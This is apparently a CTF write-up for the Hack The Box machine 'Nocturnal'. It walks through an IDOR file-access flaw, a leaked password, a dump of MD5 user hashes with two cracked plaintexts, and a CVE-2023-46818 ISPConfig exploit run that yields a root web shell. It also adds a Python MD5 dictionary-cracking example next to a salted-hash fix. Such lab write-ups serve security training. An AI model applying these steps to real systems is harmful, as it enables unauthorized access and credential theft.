Nocturnal

Easy HTB Linux box

Reconnaissance

As always, we start off with a basic port enumeration scan on the target with Nmap

nmap --privileged -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN scan 10.10.11.64
# Nmap 7.95 scan initiated Mon Jul 21 17:05:53 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN scan 10.10.11.64
Nmap scan report for 10.10.11.64
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 21 17:06:13 2025 -- 1 IP address (1 host up) scanned in 20.66 seconds

We can see that port 80 (HTTP) and port 22 (SSH) are open. The HTTP title shows a redirect to http://nocturnal.htb/, so the server uses virtual hosting: we add nocturnal.htb to our /etc/hosts file and check what's inside the webpage!

The purpose of this website is uploading and viewing files, which leaves us thinking about RCE through the upload.

We register with random credentials, log in and are redirected to an "Upload File" dashboard.

We try to upload a PHP file but the web warns us with this message:

Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.

After uploading some files and intercepting the requests with BurpSuite, we see a download interface whose link points to a username (in this case mine: delorian) and a file name:

http://nocturnal.htb/view.php?username=<username>&file=file.pdf

Exploitation

Let's try brute-forcing the username parameter with BurpSuite Intruder.

Success! We found the user Amanda

We enumerate the files of the user amanda and find privacy.odt, which we can open after installing LibreOffice:

Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,

Nocturnal's IT team

We find a password, arHkG7HAI68X8s1J, and try to log in through SSH as amanda, but the password is incorrect. However, with it we can access an admin panel through login.php.

There we see that we have access to some interesting files, like login.php:

<?php
session_start();
$db = new SQLite3('../nocturnal_database/nocturnal_database.db');

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $stmt = $db->prepare("SELECT * FROM users WHERE username = :username");
    $stmt->bindValue(':username', $username, SQLITE3_TEXT);
    $result = $stmt->execute()->fetchArray();

    if ($result && md5($password) === $result['password']) {
        $_SESSION['user_id'] = $result['id'];
        $_SESSION['username'] = $username;
        header('Location: dashboard.php');
        exit();
    } else {
        $error = 'Invalid username or password.';
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Login</h1>
        <?php if (isset($error)): ?>
            <p class="error"><?php echo $error; ?></p>
        <?php endif; ?>
        <form method="post">
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Login</button>
        </form>
        <a href="register.php">Don't have an account? Register here</a>
    </div>
</body>
</html>

For now we can't do much with it, so we intercept the "Enter Password to Protect Backup" form with BurpSuite and, after testing for a bit, successfully dump some hashes!

INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb');
INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4');
INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d');
INSERT INTO users VALUES(6,'kavi','f38cde1654b39fea2bd4f72f1ae4cdda');
INSERT INTO users VALUES(7,'e0Al5','101ad4543a96a7fd84908fd0d802e7db');

We put these hashes on crackstation:

Hash                              Hash type   Password found
55c82b1ccd55ab219b3b109b07d5061d  md5         slowmotionapocalypse
f38cde1654b39fea2bd4f72f1ae4cdda  md5         kavi

Success! We extracted passwords for the users tobias:slowmotionapocalypse and kavi:kavi!!
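As an added example (not code from the box or this writeup), the script below shows why these hashes fell instantly: login.php stores and compares a bare md5($password), so a wordlist lookup recovers the password one fast, unsalted hash at a time. The second half shows the salted, slow-KDF storage that would have resisted the same dump. The hash rows are the ones dumped above; the short wordlist and the PBKDF2 parameters are constructed assumptions.

```python
import hashlib
import hmac
import os

# Rows as dumped from the SQLite users table above (username -> stored hash).
DUMPED_USERS = {
    "admin": "d725aeba143f575736b07e045d8ceebb",
    "amanda": "df8b20aa0c935023f99ea58358fb63c4",
    "tobias": "55c82b1ccd55ab219b3b109b07d5061d",
    "kavi": "f38cde1654b39fea2bd4f72f1ae4cdda",
}
# Constructed stand-in for a wordlist; a real audit would stream a full list.
WORDLIST = ["password", "kavi", "slowmotionapocalypse", "admin123"]


def md5_hex(password: str) -> str:
    """Unsalted MD5, exactly what login.php compares against."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted_md5(stored: str, wordlist):
    """Dictionary lookup: one fast hash per candidate, no salt to vary it."""
    for candidate in wordlist:
        if md5_hex(candidate) == stored:
            return candidate
    return None


def weak_accounts(users, wordlist):
    """Audit view: which stored hashes fall to the wordlist."""
    return {u: pw for u, h in users.items() if (pw := crack_unsalted_md5(h, wordlist))}


# Hardened alternative: per-user random salt, slow KDF, constant-time compare.
PBKDF2_ROUNDS = 600_000  # assumed work factor; tune to your hardware budget


def hash_password(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)  # fresh salt per stored password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)  # no early-exit timing leak


if __name__ == "__main__":
    print("accounts with wordlist passwords:", weak_accounts(DUMPED_USERS, WORDLIST))
```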

ssh tobias@nocturnal.htb
The authenticity of host 'nocturnal.htb (10.10.11.64)' can't be established.
ED25519 key fingerprint is SHA256:rpVMGW27qcXKI/SxVXhvpF6Qi8BorsH7RNh1jzi8VYc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'nocturnal.htb' (ED25519) to the list of known hosts.
tobias@nocturnal.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

tobias@nocturnal:~$ 

Privilege Escalation

tobias@nocturnal:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -

We see that TCP port 8080 is listening only on 127.0.0.1, so we forward it through SSH:

ssh -L 8080:127.0.0.1:8080 tobias@nocturnal.htb

We access localhost:8080 in our web browser and log in with the credentials admin:slowmotionapocalypse (tobias's password, reused for the admin account).

We see an ISPConfig admin panel, which we can exploit using CVE-2023-46818:

python3 exploit.py http://127.0.0.1:8080 admin slowmotionapocalypse
[+] Logging in as 'admin'
[+] Login successful.
[+] Injecting PHP shell...
[+] Shell dropped at 'sh.php'
[+] Web shell ready. Type commands below. Ctrl+C or 'exit' to quit.
ispconfig-shell# whoami
root

And we are root!!

ispconfig-shell# cat /root/root.txt && cat /home/tobias/user.txt
6e821240c84bf32... DO IT YOURSELF!
d1275993ea71847... DO IT YOURSELF!

Hope you liked this WriteUp and see you next time!!
